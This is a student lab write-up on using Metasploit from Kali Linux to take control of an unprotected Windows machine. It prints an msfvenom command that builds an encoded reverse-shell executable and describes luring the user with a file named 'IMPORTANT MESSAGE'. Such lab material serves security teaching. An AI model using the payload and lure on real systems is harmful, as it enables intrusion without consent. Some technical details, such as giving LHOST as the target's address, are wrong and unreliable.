Ethical Hacking: Metasploit Framework for Windows Penetration Test

Verified

Added on 2023/06/04

AI Summary

This practical assignment details the process of ethical hacking using the Metasploit framework on Kali Linux to penetrate a Windows operating system. The experiment involves setting up a controlled environment with Kali Linux and a target Windows machine on the same NAT network. The process includes creating an executable file with a reverse TCP payload, sending it to the target machine, and tricking the user into executing it. Upon execution, the Metasploit listener gains full control of the victim's machine, demonstrating remote access capabilities such as file manipulation and directory removal. The assignment highlights the importance of cybersecurity awareness and the potential risks associated with unverified files.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

ICT ETHICAL HACKING (EXPLOITS) 2
Introduction
In this era where cybersecurity has emerged to be a major threat to information systems,
knowledge on some of the common penetration tests which can be used by attackers to compromise
organization systems is of paramount importance. This is because it enables the IT professionals to test
and implement the necessary measures to protect the organization data resource.
Our workshop session on common exploitation approaches used by attackers, we experimented
Metasploit exploitation under Kali Linux platform. The targeted machine was however was supposed to
be operating under Windows operating system regardless of the version (windows XP, 7, 8, 8.1 and 10).
The main aim of our experiment was to learn how attackers can be able to penetrate into machines
operating on windows remotely and without the consent of the main user of the machine (Dieterle, 2016).
Metasploit is a project which enables the attackers carry out penetration into the victim’s machine
through development of ID signatures. To achieve that, the tool enables the attackers to come up with an
exploit code which is then executed on targeted remote machines to enable them get into the machine
with full user rights (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.241).. To set up out penetration
test experiment, we required: Metasploit framework with full Ruby packages installed under the Kali
Linux platform machine and two computers running different operating systems (one Kali Linux and the
other Windows). The two machines were set under same NAT network in order to allow us retrieve their
IP addresses and PORT numbers easily. Also, since an antivirus in the targeted machine would hinder us
from realizing our exploitation objective, we made sure that the windows platform machine did not have
any antivirus software operating on it
The penetration test entirely involved carrying out commands on the Kali Linux platform
machine and the main Metasploit command we utilized was the Msfconsole because of its flexibility and
other favorable features supporting Metasploit framework. To be able to gain access into the second
machine, we needed to know the machines IP address and any of its free PORT numbers. To acquire the

ICT ETHICAL HACKING (EXPLOITS) 3
two, we simply used Netcut software considering the fact that the two machines were operating under the
same NAT network (Muniz, 2013).
Into the real business, we started by creating executable files whose unique identifiers were
basically the IP address and the PORT number we had obtained from the targeted machine using the
Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows
machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/
(desktop name).exe”. The next step was to make sure that the file is send to the targeted machine and trick
the user into opening it. So we saved the folder as “IMPORTANT MESSAGE”, to be sure that the user
will definitely be tempted to open it.
After sending the file, we activated our metasploit framework to listen to the file using the
Msfconsole command “exploit”. Under this state, the “meterpreter” would be activated on our Kali Linux
machine automatically when the targeted user opens the sent files and would enable us get access into his
or her machine immediately. So, after the file was opened on the second machine, we automatically
gained access into the victim’s machine with the full control rights just like a person logged into the
machine physically. We could carry out several operations like editing files, deleting files, viewing
folders and removing some directories (Weidman, 2014). That was a clear implication that we had gotten
into the machine remotely without the owner’s consent.
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing
Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration
testing with Metasploit framework and methodologies. In Computational Intelligence and
Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.

ICT ETHICAL HACKING (EXPLOITS) 4
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.